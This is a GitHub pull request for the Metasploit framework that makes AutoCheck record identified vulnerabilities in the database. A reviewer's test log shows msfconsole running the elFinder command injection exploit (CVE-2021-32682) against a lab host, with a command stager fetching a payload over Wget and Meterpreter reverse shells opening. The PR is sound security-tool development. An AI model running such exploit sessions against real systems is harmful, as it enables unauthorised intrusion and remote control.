Add autocheck report_vuln logic #20800
Merged
+120
−8
Conversation
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
smcintyre-r7
approved these changes
Dec 22, 2025
Contributor
smcintyre-r7
left a comment
smcintyre-r7
left a comment
There was a problem hiding this comment.
Changes look good. Ran through a quick test with an ELFinder exploit and everything worked as intended.
msf exploit(linux/http/elfinder_archive_cmd_injection) > check
[*] 192.168.159.128:8080 - The target appears to be vulnerable. elFinder running version 2.1.58
msf exploit(linux/http/elfinder_archive_cmd_injection) > vulns
Vulnerabilities
===============
Timestamp Host Name References
--------- ---- ---- ----------
2025-11-24 23:05:18 UTC 192.168.159.166 MSSQL Login Utility CVE-1999-0506
msf exploit(linux/http/elfinder_archive_cmd_injection) > set RHOSTS 19Interrupt: use the 'exit' command to quit
msf exploit(linux/http/elfinder_archive_cmd_injection) > set SRVHOST 1921.68.159.128
[-] The following options failed to validate: Value '1921.68.159.128' is not valid for option 'SRVHOST'.
SRVHOST => 0.0.0.0
msf exploit(linux/http/elfinder_archive_cmd_injection) > set SRVHOST 192.168.159.128
SRVHOST => 192.168.159.128
msf exploit(linux/http/elfinder_archive_cmd_injection) > exploit
msf exploit(linux/http/elfinder_archive_cmd_injection) > exploit
[-] Msf::OptionValidateError One or more options failed to validate: LHOST.
msf exploit(linux/http/elfinder_archive_cmd_injection) > set LHOST 192.168.159.129
LHOST => 192.168.159.129
msf exploit(linux/http/elfinder_archive_cmd_injection) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf exploit(linux/http/elfinder_archive_cmd_injection) > run
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. elFinder running version 2.1.58
[*] Uploading file niWPN.txt to elFinder
[+] Text file was successfully uploaded!
[*] Attempting to create archive KKJUJPudNg.zip
[+] Archive was successfully created!
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (192.168.159.128:8080).
[!] This exploit may require manual cleanup of 'niWPN.txt' on the target
[!] This exploit may require manual cleanup of 'KKJUJPudNg.zip' on the target
[*] Exploit completed, but no session was created.
msf exploit(linux/http/elfinder_archive_cmd_injection) > set SRVPORT 8081
SRVPORT => 8081
msf exploit(linux/http/elfinder_archive_cmd_injection) > check
[*] 192.168.159.128:8080 - The target appears to be vulnerable. elFinder running version 2.1.58
msf exploit(linux/http/elfinder_archive_cmd_injection) > vulns
Vulnerabilities
===============
Timestamp Host Name References
--------- ---- ---- ----------
2025-11-24 23:05:18 UTC 192.168.159.166 MSSQL Login Utility CVE-1999-0506
2025-12-22 20:51:10 UTC 192.168.159.128 exploit/linux/http/elfinder_archive_cmd_injection CVE-2021-32682,URL-https://blog.sonarsource.com/elfinder-case-study-of-web-file-manager-vulnerabilities
msf exploit(linux/http/elfinder_archive_cmd_injection) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. elFinder running version 2.1.58
[*] Uploading file Gyqsku.txt to elFinder
[+] Text file was successfully uploaded!
[*] Attempting to create archive mCyiNy.zip
[+] Archive was successfully created!
[*] Using URL: http://192.168.159.128:8081/VAijaLrGtX8lC
[*] Client 192.168.159.128 (Wget/1.20.1 (linux-gnu)) requested /VAijaLrGtX8lC
[*] Sending payload to 192.168.159.128 (Wget/1.20.1 (linux-gnu))
[*] Command Stager progress - 54.24% done (64/118 bytes)
[*] Command Stager progress - 72.88% done (86/118 bytes)
[*] Sending stage (1062760 bytes) to 192.168.159.128
[+] Deleted Gyqsku.txt
[+] Deleted mCyiNy.zip
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.128:56842) at 2025-12-22 15:51:27 -0500
[*] Command Stager progress - 83.90% done (99/118 bytes)
[*] Command Stager progress - 100.00% done (118/118 bytes)
[*] Server stopped.
meterpreter >
meterpreter >
meterpreter > exit
[*] Shutting down session: 1
[*] 192.168.159.128 - Meterpreter session 1 closed. Reason: User exit
msf exploit(linux/http/elfinder_archive_cmd_injection) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. elFinder running version 2.1.58
[*] Uploading file cErheNNdn.txt to elFinder
[+] Text file was successfully uploaded!
[*] Attempting to create archive EZBxWebTqk.zip
[+] Archive was successfully created!
[*] Using URL: http://192.168.159.128:8081/G0eMumBodYumZty
[*] Client 192.168.159.128 (Wget/1.20.1 (linux-gnu)) requested /G0eMumBodYumZty
[*] Sending payload to 192.168.159.128 (Wget/1.20.1 (linux-gnu))
[*] Command Stager progress - 55.00% done (66/120 bytes)
[*] Command Stager progress - 73.33% done (88/120 bytes)
[*] Sending stage (1062760 bytes) to 192.168.159.128
[+] Deleted cErheNNdn.txt
[+] Deleted EZBxWebTqk.zip
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.128:42562) at 2025-12-22 15:51:52 -0500
[*] Command Stager progress - 84.17% done (101/120 bytes)
[*] Command Stager progress - 100.00% done (120/120 bytes)
[*] Server stopped.
meterpreter >
meterpreter > exit
[*] Shutting down session: 2
[*] 192.168.159.128 - Meterpreter session 2 closed. Reason: User exit
msf exploit(linux/http/elfinder_archive_cmd_injection) > vulns
Vulnerabilities
===============
Timestamp Host Name References
--------- ---- ---- ----------
2025-11-24 23:05:18 UTC 192.168.159.166 MSSQL Login Utility CVE-1999-0506
2025-12-22 20:51:10 UTC 192.168.159.128 exploit/linux/http/elfinder_archive_cmd_injection CVE-2021-32682,URL-https://blog.sonarsource.com/elfinder-case-study-of-web-file-manager-vulnerabilities
msf exploit(linux/http/elfinder_archive_cmd_injection) >
Contributor
Release NotesThis updates the AutoCheck mixin that exploits use to automatically check for a vulnerability before proceeding with an exploit attempt. The update ensures that vulnerabilities that are identified by this check are reported to the database. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
2 participants
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
Modules that run a
checkbefore exploitation and are successful and identifying a vulnerability will now register a vulnerability with the identified hostVerification
vulnsandvulns --verbosecommand should output all details:Before this change; in an empty workspace - no vuln or vuln attempts would be registered. Note: This is an MVP implementation to bubble up the vulnerability reporting logic, we will still likely want an extra iteration to add the different metadata to the report_vuln logic to differentiate between between check methods and exploit methods to the user, as well as some of the more specific CheckCode metadata.